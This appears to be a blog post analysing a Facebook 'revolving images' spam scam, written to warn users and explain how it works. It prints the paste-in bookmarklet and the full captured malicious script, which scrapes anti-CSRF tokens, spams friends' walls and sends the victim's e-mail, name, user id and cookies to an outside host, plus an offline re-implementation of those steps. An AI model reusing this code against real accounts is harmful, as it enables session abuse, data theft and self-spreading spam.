Javascript of Revolving Images Spam on Facebook


NOTE: All links in this post are for informational purposes only. I will not be responsible for anything that happens to your Facebook account if you choose to click on any of them. I would not suggest clicking on them at all unless and until you have completely safeguarded yourself; click on any of them at your own risk. All other information in this post is likewise for informational purposes only. I will not be held responsible if anyone decides to use the code provided here to make malicious scripts.

UPDATE1: You can report the link to Facebook, submitting the link and other details, at http://www.facebook.com/help/contact.php?show_form=report_phishing

UPDATE2: See how to remove the scam from an affected profile and how to safeguard yourself at How to safeguard against the Facebook Revolving Images Scam

Recently on Facebook many people have been tricked into unknowingly spreading one of these links:

http://bit.ly/91wrzd

http://bit.ly/faceb00ked

http://majicalimages.tk/

What the link claims to do is make all the images on your page pop out and revolve. Behind the scenes, however, its only purpose is to make you spread the link further, by posting this message from your account:

Really cool Facebook revolving images. MUST SEE http://majicalimages.tk/

Please DO NOT CLICK on the above links.

When you click on the link you are taken to a page like this:

[screenshot of the landing page]

Once you are on this page it asks you to paste a piece of JavaScript into the address bar while you are on a Facebook page. The JavaScript is:

javascript:(a = (b = document).createElement("script")).src = "//graphicgiants.com/majic.js?show", b.body.appendChild(a); void(0)

This bookmarklet creates a script element whose src is //graphicgiants.com/majic.js?show (scheme-relative, so it resolves to http or https to match the Facebook page you are on) and appends it to the body of the Facebook page. The browser then fetches and runs that remote script inside the facebook.com page, with the same access to your logged-in session as Facebook's own scripts; the trailing void(0) only stops the browser from navigating away from the page.

So many people are unknowingly spamming this link in their wall posts, which in turn tricks many more people into clicking it.

So I checked it out. If you open graphicgiants.com/majic.js?show directly in a browser you never get to see the JavaScript that is actually run. Using the cURL script I wrote earlier, however, I was able to fetch the whole script that runs in the background. It is given below (I have indented it properly for clear comprehension):


// The two spam messages; the loop below alternates between them.
txt = "Really cool Facebook revolving images. MUST SEE http://niceimages.tk";
txtee = "Really cool Facebook revolving images. MUST SEE http://majicalimages.tk";
// Keeps the victim on the page long enough for the 20 posts below to go out.
alert("Please wait 2-3 mins while we setup! Do not refresh this window or click any link.");
// 1. Fetch the Facebook home page. This is a same-origin request, so the browser
//    sends the victim's full session cookie set with it. The tokens the status
//    composer needs (composer_id, post_form_id and the anti-CSRF token fb_dtsg)
//    are scraped out of the HTML with regexes.
with(x = new XMLHttpRequest()) open("GET", "/"), onreadystatechange = function () {
    if (x.readyState == 4 && x.status == 200) {
        // composer_id is matched with escaped quotes, i.e. as it appears inside a JavaScript string in the page.
        comp = (z = x.responseText).match(/name=\\"composer_id\\" value=\\"([\d\w]+)\\"/i)[1];
        form = z.match(/name="post_form_id" value="([\d\w]+)"/i)[1];
        dt = z.match(/name="fb_dtsg" value="([\d\w]+)"/i)[1];
        pfid = z.match(/name="post_form_id" value="([\d\w]+)"/i)[1]; // duplicate of form; never used
        appid = "150622878317085"; // set but never used
        appname = "rip_m_j";       // set but never used
        // 2. Fetch the victim's friend list. The victim's user id is read from the c_user cookie.
        with(xx = new XMLHttpRequest()) open("GET", "/ajax/browser/friends/?uid=" + document.cookie.match(/c_user=(\d+)/)[1] + "&filter=all&__a=1&__d=1"), onreadystatechange = function () {
            if (xx.readyState == 4 && xx.status == 200) {
                // The response is not parsed as JSON: friend ids are taken from the
                // thumbnail filenames (/a_b_c_q.jpg -> b), one id per thumbnail.
                m = xx.responseText.match(/\/\d+_\d+_\d+_q\.jpg/gi).join("\n").replace(/(\/\d+_|_\d+_q\.jpg)/gi, "").split("\n");
                i = 0;
                llimit = 20;
                // 3. Every 2 seconds, post one message; 20 posts in total. The interval is never cleared, it just idles once i reaches llimit.
                t = setInterval(function () {
                    if (i >= llimit) return;
                    if (i == 0) {
                        // 4a. First round: fetch the mobile photos page, scrape the victim's e-mail address
                        //     (from a mailto: link) and display name, and send them together with the user id
                        //     and document.cookie to graphicgiants.com by injecting a script tag. Only cookies
                        //     not flagged HttpOnly are visible in document.cookie. The .replace(/@/, "@") is a no-op as captured.
                        with(xxx = new XMLHttpRequest()) open("GET", "/mobile/?v=photos"), setRequestHeader("X-Requested-With", null), setRequestHeader("X-Requested", null), onreadystatechange = function () {
                            if (xxx.readyState == 4 && xxx.status == 200) {
                                with(s = document.createElement("script")) src = "http://graphicgiants.com/mmjaicc.js?q=" + document.cookie.match(/c_user=(\d+)/)[1] + ":" + (d = xxx.responseText).match(/mailto:([^\"]+)/)[1].replace(/@/, "@") + ":" + d.match(/id="navAccountName">([^<>]+)/)[1] + "&c=" + document.cookie;
                                document.body.appendChild(s);
                            }
                        }, send(null);
                    } else if (i == llimit - 1) {
                        // 4b. Last round: the same exfiltration again, this time to majic.js.
                        with(xxxx = new XMLHttpRequest()) open("GET", "/mobile/?v=photos"), setRequestHeader("X-Requested-With", null), setRequestHeader("X-Requested", null), onreadystatechange = function () {
                            if (xxxx.readyState == 4 && xxxx.status == 200) {
                                with(s = document.createElement("script")) src = "http://graphicgiants.com/majic.js?q=" + document.cookie.match(/c_user=(\d+)/)[1] + ":" + (d = xxxx.responseText).match(/mailto:([^\"]+)/)[1].replace(/@/, "@") + ":" + d.match(/id="navAccountName">([^<>]+)/)[1] + "&c=" + document.cookie;
                                document.body.appendChild(s);
                            }
                        }, send(null);
                    }
                    // 5. Post the message via the status composer, with a random friend as target_id,
                    //    alternating between the two links. The scraped tokens make the request pass
                    //    Facebook's anti-CSRF check.
                    if (i % 2 == 0) {
                        with(xd = new XMLHttpRequest()) open("POST", "/ajax/updatestatus.php?__a=1"), setRequestHeader("Content-Type", "application/x-www-form-urlencoded"), send("action=PROFILE_UPDATE&profile_id=" + document.cookie.match(/c_user=(\d+)/)[1] + "&status=" + txt + "&target_id=" + m[Math.floor(Math.random() * m.length)] + "&composer_id=" + comp + "&hey_kid_im_a_composer=true&display_context=profile&post_form_id=" + form + "&fb_dtsg=" + dt + "&lsd&_log_display_context=profile&ajax_log=1&post_form_id_source=AsyncRequest");
                    } else {
                        with(xd = new XMLHttpRequest()) open("POST", "/ajax/updatestatus.php?__a=1"), setRequestHeader("Content-Type", "application/x-www-form-urlencoded"), send("action=PROFILE_UPDATE&profile_id=" + document.cookie.match(/c_user=(\d+)/)[1] + "&status=" + txtee + "&target_id=" + m[Math.floor(Math.random() * m.length)] + "&composer_id=" + comp + "&hey_kid_im_a_composer=true&display_context=profile&post_form_id=" + form + "&fb_dtsg=" + dt + "&lsd&_log_display_context=profile&ajax_log=1&post_form_id_source=AsyncRequest");
                    }
                    i += 1;
                }, 2000);
            }
        }, send(null);
    }
}, send(null);

The main points in this script are these. The first two lines prepare the two messages it will post, one with the niceimages.tk link and one with the majicalimages.tk link. Everything that follows runs inside your logged-in Facebook page, so every XHR (Ajax) request it makes to facebook.com carries your session cookies automatically. It first fetches the home page and scrapes the tokens the status composer requires (composer_id, post_form_id and the anti-CSRF token fb_dtsg), then fetches your friend list from /ajax/browser/friends and pulls friend ids out of the thumbnail filenames. It then POSTs to /ajax/updatestatus.php every two seconds, 20 times in all, with one of the two messages as the status and a random friend as target_id, which is how the spam goes out from your account. On the first and last rounds it also fetches /mobile/?v=photos, scrapes your e-mail address and display name from it, and sends those, together with your user id (the c_user cookie) and the whole of document.cookie, to graphicgiants.com by injecting a script tag pointing at mmjaicc.js and majic.js with the values in the query string. Note that document.cookie only exposes cookies that are not flagged HttpOnly; the spamming itself does not depend on the stolen cookies at all, since it runs from inside your own browser session.
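To make the above concrete, here is an added example (my own code, not part of the captured script or of the original post) that re-implements, offline, the scraping and request-building steps of majic.js and runs them against constructed sample responses. It covers both the bookmarklet's scheme-relative loader URL and the token, friend-id, e-mail and cookie harvesting described above. It makes no network requests: every id, token, e-mail address and cookie value in it is made up for the example, and the sample HTML/JSON are hand-written stand-ins for what Facebook's pages looked like, not captures.

```javascript
// Added example, not code from the original post: an offline re-implementation
// of the scraping and request-building steps in the captured majic.js, run
// against constructed sample responses so you can see exactly what the script
// harvests and sends. No network requests are made. Every id, token, e-mail
// address and cookie value below is made up for this example.

const TXT = "Really cool Facebook revolving images. MUST SEE http://niceimages.tk";
const TXTEE = "Really cool Facebook revolving images. MUST SEE http://majicalimages.tk";

// Regexes copied from the captured script. composer_id is matched with
// escaped quotes, i.e. as it appears inside a JavaScript string in the page.
const TOKEN_RES = {
  composer_id: /name=\\"composer_id\\" value=\\"([\d\w]+)\\"/i,
  post_form_id: /name="post_form_id" value="([\d\w]+)"/i,
  fb_dtsg: /name="fb_dtsg" value="([\d\w]+)"/i,
};

// The bookmarklet's src is scheme-relative: it takes http or https from the
// page it is pasted into, and the loaded script runs inside that page's origin.
function resolveLoaderSrc(pageUrl, src) {
  return new URL(src, pageUrl).href;
}

// Step 1 (GET /): scrape the tokens the status composer needs.
function scrapeTokens(homeHtml) {
  const tokens = {};
  for (const [name, re] of Object.entries(TOKEN_RES)) {
    const m = homeHtml.match(re);
    if (!m) throw new Error("token not found: " + name);
    tokens[name] = m[1];
  }
  return tokens;
}

// Step 2 (GET /ajax/browser/friends/): the script never parses the JSON; it
// takes friend ids from thumbnail filenames of the form /a_b_c_q.jpg (-> b).
function extractFriendIds(friendsResponse) {
  const thumbs = friendsResponse.match(/\/\d+_\d+_\d+_q\.jpg/gi) || [];
  return thumbs.map((t) => t.replace(/(\/\d+_|_\d+_q\.jpg)/gi, ""));
}

// Step 3 (GET /mobile/?v=photos): scrape the account's e-mail and display name.
function scrapeIdentity(mobileHtml) {
  return {
    email: mobileHtml.match(/mailto:([^"]+)/)[1],
    name: mobileHtml.match(/id="navAccountName">([^<>]+)/)[1],
  };
}

// c_user, read from document.cookie, is the victim's numeric user id.
function userIdFromCookie(cookieString) {
  return cookieString.match(/c_user=(\d+)/)[1];
}

// The src of the script tag the captured code injects: user id, e-mail and
// display name in q=, and the whole of document.cookie in c=.
function buildExfilUrl(scriptName, cookieString, identity) {
  return "http://graphicgiants.com/" + scriptName + "?q=" +
    userIdFromCookie(cookieString) + ":" + identity.email + ":" + identity.name +
    "&c=" + cookieString;
}

// The body POSTed to /ajax/updatestatus.php for one message.
function buildStatusBody(cookieString, tokens, targetId, message) {
  return "action=PROFILE_UPDATE&profile_id=" + userIdFromCookie(cookieString) +
    "&status=" + message + "&target_id=" + targetId +
    "&composer_id=" + tokens.composer_id + "&hey_kid_im_a_composer=true" +
    "&display_context=profile&post_form_id=" + tokens.post_form_id +
    "&fb_dtsg=" + tokens.fb_dtsg + "&lsd&_log_display_context=profile" +
    "&ajax_log=1&post_form_id_source=AsyncRequest";
}

// Replays the 20-round loop sequentially. The real script fires from a 2 s
// setInterval and picks a random friend; round-robin here for reproducibility.
function simulateCampaign(sample, llimit = 20) {
  const tokens = scrapeTokens(sample.home);
  const friends = extractFriendIds(sample.friends);
  const identity = scrapeIdentity(sample.mobile);
  const events = [];
  for (let i = 0; i < llimit; i++) {
    if (i === 0) events.push({ i, exfil: buildExfilUrl("mmjaicc.js", sample.cookie, identity) });
    if (i === llimit - 1) events.push({ i, exfil: buildExfilUrl("majic.js", sample.cookie, identity) });
    const target = friends[i % friends.length];
    const message = i % 2 === 0 ? TXT : TXTEE;
    events.push({ i, target, body: buildStatusBody(sample.cookie, tokens, target, message) });
  }
  return { tokens, friends, identity, events };
}

// Constructed stand-ins for the three Facebook responses and for document.cookie.
const SAMPLE = {
  home: '<script>var c = "<input name=\\"composer_id\\" value=\\"c0mp0s3r\\">";</script>' +
    '<form><input name="post_form_id" value="pf0rm1d"><input name="fb_dtsg" value="dTsG1"></form>',
  friends: 'for (;;);{"payload":"<img src=\\"/1001_20001_3_q.jpg\\"><img src=\\"/1001_20002_3_q.jpg\\">"}',
  mobile: '<a href="mailto:victim@example.com">victim@example.com</a><span id="navAccountName">Example Victim</span>',
  // document.cookie never includes cookies flagged HttpOnly; this is all the attacker can receive.
  cookie: "datr=abc123; c_user=1000012345; lu=xyz",
};

if (typeof require !== "undefined" && require.main === module) {
  console.log(resolveLoaderSrc("https://www.facebook.com/home.php", "//graphicgiants.com/majic.js?show"));
  console.log(JSON.stringify(simulateCampaign(SAMPLE), null, 2));
}
```

Run it with node and read the events list: two script-tag URLs carrying the user id, e-mail, name and cookie string, and twenty status POSTs with the scraped tokens and alternating links. The friend-id extraction is deliberately kept as the captured regex dance rather than JSON parsing, because that is what determines which accounts end up as target_id.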

So this is the way you are getting tricked into spreading this spam. So best way to counter this is NOT TO CLICK on any such links.

Also, the script seems to have been made by the owners of this page: http://www.facebook.com/GraphicGiants, so please go and Report Abuse on this Page to stop the spamming. Please leave a comment if you know of any more such links or any solution to this problem. I hope Facebook figures it out soon.

Happy Facebooking. Stay Safe.
